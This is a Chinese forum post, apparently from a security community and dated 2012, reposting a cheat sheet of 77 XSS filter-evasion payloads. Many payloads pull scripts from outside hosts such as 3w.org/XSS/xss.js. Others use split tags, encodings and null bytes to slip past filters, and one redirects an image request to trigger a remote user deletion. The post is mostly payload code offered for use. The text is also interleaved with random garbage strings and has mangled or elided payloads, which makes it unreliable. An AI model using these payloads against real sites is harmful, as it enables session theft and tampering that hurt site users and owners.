貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。
+ J" c' O* T% h0 e* V4 O. i7 e8 d2 h _& c0 F
(1)普通的XSS JavaScript注入( u# a" v7 M% P1 J1 G$ W% ~
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>3 c0 o$ j' K0 g& U7 L* y
% z# r8 h9 `5 n (2)IMG标签XSS使用JavaScript命令
1 Z! }# E% y; V, N <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
1 n. ~1 R$ B8 @" T' Z
" L8 p5 X0 E: d7 K3 E% A& j$ S (3)IMG标签无分号无引号
5 ^ _* ~0 {: s; Z! S0 a <IMG SRC=javascript:alert(‘XSS’)>
: f. Y: M+ h8 V$ n6 d& C( a
; h1 L+ y" u4 N6 ~+ [ (4)IMG标签大小写不敏感% s/ K4 H9 I! ?/ A% o9 {3 V7 s
<IMG SRC=JaVaScRiPt:alert(‘XSS’)> I2 [7 f2 k5 {# D: }2 m; a$ @
( ?, c9 C. |. \, ^$ } (5)HTML编码(必须有分号)
3 k# A8 J/ r) E, m% L" A% r7 {0 H0 A <IMG SRC=javascript:alert(“XSS”)>
# w5 ]: X; i* R% D3 e8 C* O7 Q( ]- w1 p% q0 r) x( v
(6)修正缺陷IMG标签
& b! a( |4 p. n! W' ^1 X, k) a. k <IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
, S: X5 |. x7 j3 X; a
- }8 M5 o/ X1 A7 c! p (7)formCharCode标签(计算器)
& j2 |- e$ e) p C' Y" I+ \# m <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
1 O/ r6 Y% L; D/ J( s6 f
* y0 ^; Q2 x* ` x9 E (8)UTF-8的Unicode编码(计算器). x' O! p( K% {
<IMG SRC=jav..省略..S')>
$ d' N1 k$ i1 N3 O' ]6 s/ e
9 l4 a# k% p$ V7 y) A/ f5 \; l7 q k (9)7位的UTF-8的Unicode编码是没有分号的(计算器)
! P& x7 c, o$ s <IMG SRC=jav..省略..S')>8 w) k6 g- r* X% C+ d* q5 B0 S; x
* L3 d* n. K4 z# F
(10)十六进制编码也是没有分号(计算器)
% ~9 @- q, e( x <IMG SRC=java..省略..XSS')>
; d5 E6 y) H1 i- Y( R
0 ?* _2 u$ _3 ~9 v/ N6 v( A (11)嵌入式标签,将Javascript分开
q0 l' ]5 S$ t F <IMG SRC=”jav ascript:alert(‘XSS’);”>
/ _( c7 v$ r! E, R
- T( g7 \+ Z K2 n0 v (12)嵌入式编码标签,将Javascript分开
8 ]$ H" y4 a, O) h( e2 Q <IMG SRC=”jav ascript:alert(‘XSS’);”>
; p6 A8 V* J) i, F( u1 t! c: }+ d$ r! V
(13)嵌入式换行符
9 W0 \+ a& b6 I( Z4 S1 w, a* i+ w <IMG SRC=”jav ascript:alert(‘XSS’);”>
; p* q+ t( \" Z
6 V8 ~6 a* |5 ] (14)嵌入式回车5 p5 ^- h/ _4 s5 o
<IMG SRC=”jav ascript:alert(‘XSS’);”>0 C3 O! u4 g5 d- q! e
* t* P) ?+ Z3 C7 t0 [, ?) h5 {
(15)嵌入式多行注入JavaScript,这是XSS极端的例子( Y- B3 E/ S& G+ }( M" L' z" I
<IMG SRC=”javascript:alert(‘XSS‘)”>
! S2 y; B/ z3 t: ?; g% @
/ t! }7 z0 t7 E P (16)解决限制字符(要求同页面)7 f) s; \) e9 f, w" w1 I
<script>z=’document.’</script>
+ k1 q* z4 e8 E2 Q <script>z=z+’write(“‘</script>
7 W/ [7 ?4 b7 }( `+ A- D <script>z=z+’<script’</script>5 i1 e- I" q+ k+ U, l! o
<script>z=z+’ src=ht’</script>! S$ j7 Z5 N5 I. y2 t1 T& w3 h
<script>z=z+’tp://ww’</script>
- s7 V7 i- g3 Y4 n- s. H$ e <script>z=z+’w.shell’</script>
H+ f# S/ N! N9 T+ Z/ s <script>z=z+’.net/1.’</script>$ {0 H4 z! k6 [/ b" \$ c
<script>z=z+’js></sc’</script>1 W7 W7 h- b3 ?4 F
<script>z=z+’ript>”)’</script>
* I' a; C% l, Z1 r <script>eval_r(z)</script>) i. \; m0 j9 t7 b: D5 \
" F! z; c0 i( O# ]5 A (17)空字符
& D) b+ f7 i; I$ C, J# L# r1 \ perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
% i& W8 c2 r- d7 W4 l% w2 ^
8 A! {2 f$ r3 x: z6 M (18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
5 b3 c: U2 z" z& S, x perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out8 F$ H- Q5 V4 T. e0 d0 J* f
% W, p, s7 F0 n5 P
(19)Spaces和meta前的IMG标签. }( v' O5 l7 Z3 z0 j9 f+ d
<IMG SRC=” � javascript:alert(‘XSS’);”>) R& S9 e6 j( }+ J. a" a8 k
9 z/ G+ D. ^3 V7 j+ i; f; U (20)Non-alpha-non-digit XSS2 Y0 t6 h7 r/ v
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
7 V: j1 i! {6 {1 i) U6 Z: U3 _5 o& D& ^, x
(21)Non-alpha-non-digit XSS to 2
. ?( B1 R& ~, t5 s <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>8 I1 l6 L( c5 @) Z9 l8 N8 ~ a
6 |! Q+ C% z: V( }2 r% x (22)Non-alpha-non-digit XSS to 3( Y) ~2 t5 g* @4 q6 ^
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
& V1 }+ Q: Z- m: M# Y* k2 l" x! s) S! c4 A* h4 N7 x
(23)双开括号1 q, F0 `/ o, A" w8 B; Q! ~
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
3 s2 Z. u7 V( Q; s
* e" F: e) Q* m# V (24)无结束脚本标记(仅火狐等浏览器)
7 \5 y/ W3 }% m$ \: M <SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
9 R5 S7 ]1 l7 j0 E5 [, m c8 E; c3 F0 R9 P7 G
(25)无结束脚本标记21 ]! }1 ~' a; T4 n
<SCRIPT SRC=//3w.org/XSS/xss.js>
f6 S" {+ N* W' f( X" C; X; m( V, a o; m! V9 a
(26)半开的HTML/JavaScript XSS# ]2 { R+ D( Q5 R4 \% I0 W
<IMG SRC=”javascript:alert(‘XSS’)”
W6 q- ] {" l* g+ } B
8 V v) p ^( ^ \# C/ k8 K (27)双开角括号# c+ `6 B: k7 J% p* c. p
<iframe src=http://3w.org/XSS.html <
4 J) F, F; c- }* Z- ~4 h/ h9 ?
. E& s+ q5 d+ P) e* I' c (28)无单引号 双引号 分号
+ D5 _9 x- X0 e& H: b: u <SCRIPT>a=/XSS/
6 i# {7 v; o) B& Q1 A8 \7 H" N alert(a.source)</SCRIPT>
% I4 R* C$ N/ F/ u/ `$ l) K- ?6 y! a8 N1 E, }9 C
(29)换码过滤的JavaScript
* |* ?$ u: L( ^5 P5 z$ V \”;alert(‘XSS’);//
0 c3 @& D1 m }6 t
6 `% A. z3 ^% U, |3 P& c3 x! R (30)结束Title标签
+ X3 I" G& e5 r </TITLE><SCRIPT>alert(“XSS”);</SCRIPT>3 {- X4 Z+ K O8 P3 S* ^
6 l* j; ^# V! X, x/ ^& j7 j, N# ^ ^ (31)Input Image7 [8 H$ y3 Z- m
<INPUT SRC=”javascript:alert(‘XSS’);”>
& w1 r; k4 `% Y, Y5 }7 E* @
- p5 J. U7 Y: U2 @3 ^6 W (32)BODY Image" D) e( ~% c& W2 @/ V% C
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>2 y0 S$ o; q6 f4 T1 ^4 \( S
% _4 s9 m. ]% V8 C0 W! C7 M( \
(33)BODY标签
; @1 _- l1 L$ B/ }$ e, n6 ? k <BODY(‘XSS’)>2 ` f- u- _" h
+ ?* X2 H# {/ y# v1 I8 O( B (34)IMG Dynsrc X3 ]3 _) a8 v: b* l7 }* k$ z9 U
<IMG DYNSRC=”javascript:alert(‘XSS’)”>- ?" H4 c* |0 w+ ]5 o
8 t }# I- p t+ n: O b (35)IMG Lowsrc
. {2 |* w5 b; ? <IMG LOWSRC=”javascript:alert(‘XSS’)”>
5 T9 n( y) K' A# S0 `. N- H$ Q0 S$ @- g) r% h4 A
(36)BGSOUND. J3 L/ y/ Z3 U; C" i: h
<BGSOUND SRC=”javascript:alert(‘XSS’);”>% N/ y3 o! y* G5 b' W6 X8 S8 E
0 n K7 w4 D; K: m! \2 [. \0 O
(37)STYLE sheet; q( z. l4 E. y: E
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>/ d2 @4 F2 ?( |) }' ]/ y
; v" H8 m0 ~ @0 h+ r, h (38)远程样式表
5 ^% n3 f) E' v; p" x6 ~. ^9 x <LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
3 G) u! g$ L8 O; W4 s! {
+ w4 D8 [ T! b" L& ` (39)List-style-image(列表式)/ E9 j8 ^5 x8 D' C' }: C$ o
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
y; v: c6 l* P( q- Q+ M7 j2 S: r
% H7 [* c! ?3 c* f( N+ a+ O. ^ (40)IMG VBscript
4 G* S" a/ {. o H, Q <IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS% J* s7 h* z; }1 R4 n% T
* I0 }/ [+ H! E$ I: P' c! z$ }8 v (41)META链接url
, }, \% l- }0 g* z" F5 n2 _' [, | <META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>4 \" A7 j$ g$ Y* a. F" R0 Z
' }- V( |" K) C0 j" y& K' t
(42)Iframe& H# l" q: r4 `1 l
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>. B2 L6 |3 F: t; L% `9 L
5 ?) ~: V; J j$ s% b$ ?) l (43)Frame. J0 R, C& K; e7 z# o# g
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
( b8 l' I2 V& A* b' U& F# p7 h4 l G2 G9 s3 A
(44)Table
. F( `! {" _2 T <TABLE BACKGROUND=”javascript:alert(‘XSS’)”>+ O( x9 Y. R" ~2 K1 k1 E( s
1 j, Q0 n- t# a9 L L, _2 I+ @
(45)TD3 ~$ _$ P# [; I6 y- s" R7 o
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
2 N$ G& {0 X! L0 X9 S/ C% w
! V1 d8 z; B* W% W# ` (46)DIV background-image
0 n3 J, [8 [ b2 E/ [' C <DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>; |" W1 K3 c$ i
/ R# p: L7 m! W1 [- k- T
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
# v- E4 S9 A1 A5 C/ Y7 |8 f <DIV STYLE=”background-image: url(�javascript:alert(‘XSS’))”>8 r0 J6 S4 x7 J2 }* ~& I6 @
/ f# [2 d! z+ e: Q. N+ ~6 a" m (48)DIV expression
% S4 F0 |% r8 g <DIV STYLE=”width: expression_r(alert(‘XSS’));”>4 A9 P6 h5 a8 J+ [& M3 C
' S3 R) Y7 y2 m: [ (49)STYLE属性分拆表达% ~- D# q; s1 ^+ N# X% r
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>2 t' J4 ^2 j G2 F3 v7 S$ \. o
( {: |0 Q2 N- Q2 p7 S
(50)匿名STYLE(组成:开角号和一个字母开头)
# N, `8 R0 Y4 C# h <XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
" \+ ~7 o1 G9 p o6 P- j6 n) l, ?/ M: U
(51)STYLE background-image4 I$ Y) b. ~, ^8 ]3 N& E) P b
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
% R+ E5 p% ~2 s, ?3 C2 x/ p2 x, D. H3 g4 j1 C5 G/ m5 Q
(52)IMG STYLE方式
4 `7 K: q: l5 b { exppression(alert(“XSS”))’>% @; X! F7 }8 X# W
2 Q+ t$ M" @3 e, b
(53)STYLE background, u- f$ H) X' K2 O5 b6 g" c. W0 s
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>$ U% f6 R1 C( E9 _0 g* K
4 k0 B3 T7 [# E+ ]6 `& J" ? h6 ` (54)BASE& }. f, N1 P& f# Q7 t% B
<BASE HREF=”javascript:alert(‘XSS’);//”>4 c" J: o. X( m9 e+ @
7 i* r- W* U6 w( ]$ g (55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
) {% E3 h5 A+ [ <EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
4 m {/ w: v% t* b5 C6 |9 R4 ?. m L- H p7 y
(56)在flash中使用ActionScrpt可以混进你XSS的代码- C: k" F. |: r% s# x; ?( n5 t
a=”get”;" @) h0 E5 M- Z
b=”URL(\”";
0 n9 X# m) I# T h( J4 J c=”javascript:”;
$ V" h) t- f) a) Q; J d=”alert(‘XSS’);\”)”;
$ W( p/ `3 X: {# d% Z eval_r(a+b+c+d);
' e6 N5 Z b0 e
% ]6 x0 y G1 k1 |6 K6 j (57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上$ N E8 u, W3 ]. s
<HTML xmlns:xss>
) ~# e. J' K" f5 M2 X <?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>% a: ^! n$ n \& d/ n2 |
<xss:xss>XSS</xss:xss>
7 ]) k( h; {3 q; ~/ c) p </HTML>
0 a* h. i% h E; ^% L
( q6 ?& g; G1 n5 {; }* [8 G% x (58)如果过滤了你的JS你可以在图片里添加JS代码来利用% I! o) z; k0 M$ w# Q
<SCRIPT SRC=””></SCRIPT> [- H) L. k+ q( ?
1 F4 J" w" }' m7 k9 b (59)IMG嵌入式命令,可执行任意命令
# H T9 G% c/ t" P" }) M: L <IMG SRC=”http://www.XXX.com/a.php?a=b”>
8 j" b5 F* V6 m( l- D
9 _" j) V3 {: j: l0 A | (60)IMG嵌入式命令(a.jpg在同服务器)0 A0 G' R B9 R
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser" _! e7 s% @) o
/ k Y5 T4 N" H6 M3 ^; C) q (61)绕符号过滤% l8 E+ p8 n$ ?8 W7 N
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
, p% v) \ D) h
* g/ Z& h% k7 {/ z3 V8 c# H3 ~9 r (62); ]& Z& ~; j8 U4 ]
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>% E( u0 Y* V z, _, s
6 o. N3 F1 T) n$ E- O& p. {
(63), D! g$ Y) z' W p
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
" ?2 B' h/ j* n) h: J5 Y- C
/ I' G; T: _$ ]! `5 j! F0 C! T (64)
& H' h% k) T) g2 D/ h2 M+ m% ` <SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
+ A* W; J3 v8 g7 n. }7 G# a+ k' \ W# E: l6 T6 @0 A
(65)
# O! G$ h/ C; a3 a <SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
, R7 u7 E1 a: q: ]6 H! H* A, n# z0 X/ L: \2 j8 r$ n& y2 k
(66)
2 C" k ^( `+ U- ^; I# ?7 z2 S <SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>. o) {3 q5 z, V2 P
& [. h6 x* V( \/ M; E+ q$ K5 G (67): v% U2 j" Y9 I6 D3 Y4 u, v
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>
: u6 c+ K# a& F1 Q/ ]
8 C& \. I' R/ [% ?3 K3 i( x& t (68)URL绕行
& H2 c% E2 N" ^! I7 f <A HREF=”http://127.0.0.1/”>XSS</A>: c- o# p/ u" C. t4 H0 b% p
: t9 N" V4 P; o9 L0 i6 U3 D" j (69)URL编码# r7 z* x" e& h2 }
<A HREF=”http://3w.org”>XSS</A>
6 I: D1 s9 g2 b [6 c0 I6 O
7 t" t" `! e9 P9 `2 }* I$ R (70)IP十进制
: P. T. P! K/ ^2 s$ o# H <A HREF=”http://3232235521″>XSS</A>
2 _: A. b+ A. a5 n' I/ @
. W+ \8 s2 F; C# ]; }1 T (71)IP十六进制1 z# N4 `+ _: U G* e. a0 e$ Z
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
, K. Y0 P( n1 Y: a5 p
3 w, ]1 Z4 K& m2 s8 B (72)IP八进制% O9 n; |5 X1 c8 M) |0 ]3 }
<A HREF=”http://0300.0250.0000.0001″>XSS</A>/ ` {- X$ }+ w
x* b N6 |( a; w. o5 Z: W8 j
(73)混合编码
3 u, E+ b w( T2 X <A HREF=”h& x3 Z6 {0 R" `
tt p://6 6.000146.0×7.147/”">XSS</A>, x: I/ L; ?( |9 ?7 \
3 c5 I; @9 d7 y! d S, i
(74)节省[http:]. a9 s7 w0 X+ F e) ], ^
<A HREF=”//www.google.com/”>XSS</A>/ e. Q$ M# c0 _7 Y l
9 @+ A, O# V/ m6 q (75)节省[www]% a) X) T. _: M+ \$ W) m
<A HREF=”http://google.com/”>XSS</A>
) p1 q6 H# l5 g0 S) s! r/ d1 K* K1 v& |2 G
(76)绝对点绝对DNS& b0 ~6 G6 q; b4 w9 {7 [
<A HREF=”http://www.google.com./”>XSS</A>7 |. {0 {3 m8 l$ l: p% j
/ _ k% t! e) W4 T& S
(77)javascript链接
' o& A8 L0 y/ `+ \' s <A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A> |
发表于 2012-9-5 14:56:34
收藏
支持
反对